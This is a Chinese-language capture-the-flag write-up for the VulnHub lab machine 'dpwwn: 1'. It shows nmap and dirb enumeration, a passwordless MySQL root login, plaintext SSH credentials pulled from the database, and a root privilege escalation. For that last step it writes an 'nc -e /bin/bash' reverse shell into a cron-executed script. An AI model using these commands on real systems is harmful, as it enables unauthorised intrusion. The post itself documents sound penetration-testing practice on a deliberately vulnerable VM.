dpwwn: 1

时间：2020-07-12 12:01:55 阅读：75 评论：0 收藏：0 [点我收藏+]

标签：print 访问 inf png 技术 tomat mys strong --

Description

Name: dpwwn: 1
Date release: 4 Aug 2019
DHCP service: Enabled
IP address: Automatically assign
Goal: Gain the root privilege and obtain the content of dpwwn-01-FLAG.txt under /root Directory.

Download

(Size: 618 MB)

Download: https://drive.google.com/file/d/1sv6EFwdPTEVNPtn-y6xpnC-zc_EH0M0K/view?usp=sharing
Download (Mirror): https://download.vulnhub.com/dpwwn/dpwwn-01.zip
Download (Torrent): https://download.vulnhub.com/dpwwn/dpwwn-01.zip.torrent ( Magnet)

主机发现

nmap -sP 192.168.91.1/24

技术图片

Kali：192.168.91.128

靶机：192.168.91.129

端口扫描

nmap -sV -p- 192.168.91.129

技术图片

开启了22端口（ssh），80端口（http），3306端口（mysql）

访问80端口服务

技术图片

尝试扫描一波目录

dirb http://192.168.91.129

技术图片

发现了一个info.php文件，好像没啥用

漏洞发现

转而看看mysql和ssh有没有值得利用的漏洞，然后发现mysql可root登录，密码为空

mysql -u root -h 192.168.91.129 -p

技术图片

然后发现ssh的数据库，的用户名和密码直接明文存储

show databases;
use ssh;
show tables;
select * from users;

技术图片

得到用户名和密码为：mistic/testP@$$swordmistic

漏洞利用

登录ssh

ssh mistic@192.168.91.129

技术图片

在mistic用户目录下发现logrot.sh文件

#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"


while : ; do
  read line
  while [[ -f $SEMAPHORE ]]; do
    sleep 1s
  done
  printf "%s\n" "$line" >> $LOGFILE
done

而且在crontab以root权限执行该文件

技术图片

get root

使用nc反弹shell

echo nc -e /bin/bash 192.168.91.128 1234 > logrot.sh

技术图片

在kali上监听1234端口

nc -lvp 1234

使用python增加交互

python -c ‘import pty; pty.spawn("/bin/bash")‘

技术图片

get flag：

技术图片

dpwwn: 1

标签：print 访问 inf png 技术 tomat mys strong --

原文地址：https://www.cnblogs.com/CH42e/p/13287811.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行